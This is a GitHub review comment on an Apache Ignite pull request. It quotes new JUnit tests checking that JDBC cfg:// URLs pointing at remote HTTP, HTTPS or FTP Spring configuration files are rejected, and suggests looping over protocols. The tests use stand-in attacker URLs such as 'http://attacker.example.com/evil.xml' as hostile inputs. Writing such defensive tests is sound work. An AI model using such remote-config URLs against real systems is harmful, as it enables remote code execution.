zstan commented on code in PR #13221:
URL: https://github.com/apache/ignite/pull/13221#discussion_r3437006017
##########
modules/clients/src/test/java/org/apache/ignite/internal/jdbc2/JdbcConnectionSelfTest.java:
##########
@@ -296,4 +296,67 @@ public void testSqlHints() throws Exception {
assertTrue(((JdbcConnection)conn).skipReducerOnUpdate());
}
}
+
+ /**
+ * Test that JDBC cfg:// URL with remote HTTP location is blocked by
default to prevent RCE.
+ */
+ @Test
+ public void testRemoteHttpCfgUrlIsBlocked() {
+ final String url = CFG_URL_PREFIX +
"http://attacker.example.com/evil.xml";
+
+ GridTestUtils.assertThrows(
+ log,
+ new Callable<Object>() {
+ @Override public Object call() throws Exception {
+ try (Connection conn = DriverManager.getConnection(url)) {
+ return conn;
+ }
+ }
+ },
+ SQLException.class,
+ "Remote Spring configuration URLs"
+ );
+ }
+
+ /**
+ * Test that JDBC cfg:// URL with remote HTTPS location is blocked by
default to prevent RCE.
+ */
+ @Test
+ public void testRemoteHttpsCfgUrlIsBlocked() {
+ final String url = CFG_URL_PREFIX +
"https://attacker.example.com/evil.xml";
+
+ GridTestUtils.assertThrows(
+ log,
+ new Callable<Object>() {
+ @Override public Object call() throws Exception {
+ try (Connection conn = DriverManager.getConnection(url)) {
+ return conn;
+ }
+ }
+ },
+ SQLException.class,
+ "Remote Spring configuration URLs"
+ );
+ }
+
+ /**
+ * Test that JDBC cfg:// URL with FTP location is always blocked.
+ */
+ @Test
+ public void testFtpCfgUrlIsAlwaysBlocked() {
+ final String url = CFG_URL_PREFIX +
"ftp://attacker.example.com/evil.xml";
Review Comment:
Let's reduce the tests a bit? Use a for loop over List.of("ftp", "https", "http")
and "ftps"?